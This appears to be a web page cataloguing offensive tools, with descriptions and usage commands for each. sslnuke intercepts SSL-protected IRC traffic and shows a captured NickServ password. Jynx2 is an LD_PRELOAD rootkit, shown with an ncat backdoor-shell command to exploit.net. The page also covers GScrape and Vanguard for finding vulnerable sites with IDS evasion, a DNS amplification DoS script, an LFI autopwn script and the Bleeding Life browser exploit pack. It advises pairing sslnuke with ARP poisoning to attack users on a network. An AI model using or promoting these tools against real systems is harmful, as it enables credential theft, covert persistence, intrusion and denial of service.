Linux

SSLNuke

sslnuke is a tool geared towards decrypting and intercepting "secured" IRC traffic. Plenty of existing tools already intercept SSL traffic, but most of them are geared towards HTTP. sslnuke targets IRC directly in order to demonstrate how easy it is to intercept "secured" communications. sslnuke usage is simple.

Usage:

First, add a user account for sslnuke to run as and add iptables rules to redirect traffic to it:

# useradd -s /bin/bash -m sslnuke
# grep sslnuke /etc/passwd
sslnuke:x:1000:1000::/home/sslnuke:/bin/bash
# iptables -t nat -A OUTPUT -p tcp -m owner ! --uid-owner 1000 -m tcp \
--dport 6697 --tcp-flags FIN,SYN,RST,ACK SYN -j REDIRECT --to-ports 4444

Finally, log in as sslnuke, build, and run sslnuke:

# su -l sslnuke
# cd sslnuke
# make
# ./sslnuke

Run an IRC client and log in to your favorite IRC network using SSL; the IRC messages will be printed to sslnuke's stdout.

[*] Received connection from: 192.168.0.5:58007
[*] Opening connection to: 1.1.1.1:6697
[*] Connection Using SSL!
[*] irc.com -> AUTH (1.1.1.1): *** Looking up your hostname...
[*] irc.com -> AUTH (1.1.1.1): *** Found your hostname
[*] irc.com -> victim (1.1.1.1): *** You are connected to irc.com with TLSv1.2-AES256-GCM-SHA384-256bits
[*] 192.168.0.5 -> nickserv (192.168.0.5): id hello
[*] [email protected] -> victim (1.1.1.1): Password accepted - you are now recognized.

sslnuke automatically detects whether a client is using SSL and decides whether or not to use SSL on its own connection accordingly. The code could also easily be modified to show web site passwords, FTP data, or anything else carried over SSL. To attack users on a network, sslnuke can be used in conjunction with an ARP poisoning tool, such as the one found at Blackhat Library, or it can be deployed on a gateway.

CryptHook

CryptHook is a modular implementation for securing existing applications with symmetric block cipher encryption. It works by hooking the base system calls for network communication, send/sendto and recv/recvfrom. CryptHook will work with any existing application that relies on these system calls.

Hooking the Calls
Hooking system calls is relatively simple, and is often used to deploy userland rootkits such as Jynx/Jynx2. For this, we're really only interested in hooking the four system calls mentioned above. With these hooks, we are able to intercept any data before it is sent across the network (for encryption), and also any data before it reaches the client/server application (for decryption).

Example Usage:
As discussed earlier, this can be used with many different client/server applications. As a demonstration, let's add a layer of encryption to sshd.

Server side:
$ LD_PRELOAD=./crypthook.so UC_KEY=OHarroNSA sshd -p 5000

Client Side:
$ LD_PRELOAD=./crypthook.so UC_KEY=OHarroNSA ssh localhost -p 5000

GScrape

GScrape is a small perl script that uses Google's Ajax API (Google::Search) to find vulnerable websites.

GScrape is a simple tool. It looks for a file specified by the user containing a list of search terms, queries Google with those search terms, and retrieves an array of websites. Those websites are then tested for Local File Inclusion and SQL injection vulnerabilities; any that are found are logged to the output file specified by the user.

Example:
perl gscrape.pl -f dork.lst -o gscrape.log

Note:
GScrape will not return any results unless your input file actually contains a list of search terms.

Halcyon

Generates Kolkata fingerprints for web application identification.
Halcyon is a repository crawler that computes checksums for the static files found within a given git repository. After performing a change frequency analysis, it begins recording checksums with the static files updated most often and works its way down from there. Using the checksum data, the application then generates well-formed version fingerprint signatures in YML format, for easy feeding into Kolkata. Additionally, the signature output includes the revision ID, so it may be possible to find the exact commit for the instance of the application in question.

Dependencies:
git repository software

Usage:
The application may be time-intensive, depending on the volume of files that need to be checksummed and the number of revisions that they may have.

usage: halcyon.py [-h] [-c] -u URL -f FILE -m MATCH
                  [--omit-directory OMIT_DIRECTORY] [-t TOP]

optional arguments:
  -h, --help            show this help message and exit
  -c, --clone           Clone the repo first.
  -u URL, -p URL, --url URL, --path URL
                        Path or URL to the repository.
  -f FILE, --file FILE  File to search for version information
  -m MATCH, --match MATCH
                        Regex to match line with version number (ie: '^\\\$wp_version = \x27([^']+)\x27;$')
  --omit-directory OMIT_DIRECTORY
                        Comma separated list of directories to omit. (Helpful for removing install directories from signature generation)
  -t TOP, --top TOP     Top 'n' most-frequently-edited files to use. (0 for unlimited)

Example:
python2 halcyon.py -u https://github.com/WordPress/WordPress.git -c -f wp-version.php -m "^\\\$wp_version = \x27([^']+)\x27;$" -t 1

Jynx Rootkit/2.0

Jynx2 is an expansion of the original Jynx LD_PRELOAD rootkit written in C, with several modifications: multi-factor authentication, a more compatible shell drop, and additional hiding features.

Features:
Hiding from netstat
Hiding from ps/top and /proc
File hiding
SSL connect accept() hook
Multi-factor authentication
Improved anti-removal features
SUID Drop-shell with environment variable

Protip: It is possible to make Jynx2 even more difficult to remove by hooking C's link() function. We therefore recommend that any LD_PRELOAD rootkit be removed using a LiveCD.

Usage:
Once Jynx2 is successfully installed on a target machine, accessing its accept() hook with the default configuration looks like:

[user@host ~]$ sudo ncat exploit.net 80 -p 42 --ssl
DEFAULT_PASS
Bump with shell.
>ls -lia
214473 drwxr-xr-x 2 user users 176 Mar 7 19:19 .
177137 drwxr-xr-x 15 user users 952 Mar 5 22:15 ..

Protip: Make sure to use the --ssl flag with ncat; otherwise Jynx2 will not accept the connection, and the connection's file descriptor will be passed to the backdoored service instead.

Vanguard

Vanguard is an extensible utility with module support built for testing different types of web exploitation on a given domain.

Features

Main application features:
Fully Configurable
Web crawlers crawl all open HTTP and HTTPS ports reported by nmap
LibWhisker2 for HTTP IDS evasion (same options as nikto)
Tests via GET, POST, and COOKIE

Web penetration tests:
SQL injection (This test is signature free!)
LDAP Injection
XSS
File inclusion
Command Injection

Usage:
perl scan.pl -h [hostname] -e [evasion option]

Application Dependencies:

Notice: You must run this application as root.
You must have nmap from http://nmap.org installed to run this application correctly.
Protip: You can remove the root requirement by removing the check for root and modifying the nmap configuration.

Perl Dependencies:
LibWhisker2 requires Net::SSLeay. You may need to get this from CPAN, compile it yourself, or install it from your distribution's package manager.
YAML
Clone
Notice: You can install these libraries with CPAN.

Kolkata

Kolkata is a web application fingerprinting engine written in Perl that combines cryptography with IDS evasion. Kolkata uses session splicing for IDS evasion and configurable checksums of static files in order to determine the version of a web application.

Dependencies
LibWhisker2 - This comes bundled in the tarball, with nikto, and a variety of other tools on this site.
YAML::XS - Install with cpan in bash (cpan -i YAML::XS)

Usage
kolkata.pl -d domain.tld [-v -p [remote_path_to_web_application]]

kolkata requires a directory called sigs alongside the script.
The sigs directory must contain properly formatted yml files with checksums.

DNS Amplification Attack Script

This script works by crafting packets sent to a DNS server that allows recursion: the attacker makes a normal query that is 64 bytes in size and gets back a response that is tens of times larger than the original request.
More information can be seen at:
blog.cloudflare.com/the-ddos-that-almost-broke-the-internet

#
# DNS Amplification DOS Attack Script - Proof of Concept
#
# Co-Authored Johnathin Ferretti and Pat Litke
#
# Pat Litke | geudrik
# Jonathin Ferretti | LISTERINe
#
# January 2012
#
#
#
# Dependencies
# python-scapy
# python-dnspython
#
#

Lfi autopwn.pl

This script will attempt to gain code execution on sites vulnerable to local file inclusion, either via an httpd error log or by modifying the User-Agent and including a file containing environment variables. The PHP code execution test is performed using an arithmetic challenge, and the script uses system() as its PHP execution function. The fact that every part of this process is randomized, including the math challenge, prevents signature-based detection, while LibWhisker provides IDS evasion.

Features
Signature-free
Session Splicing
User-Agent and Log injection
Arithmetic Test

Usage
perl lfi_autopwn.pl -h www.vuln.tld -u "/vuln.ext?page=main&foo=bar" -i page

Bleeding Life

Bleeding Life 2 is an exploit pack targeting web browsers on the Microsoft Windows operating system with remote code execution buffer overflow exploits.
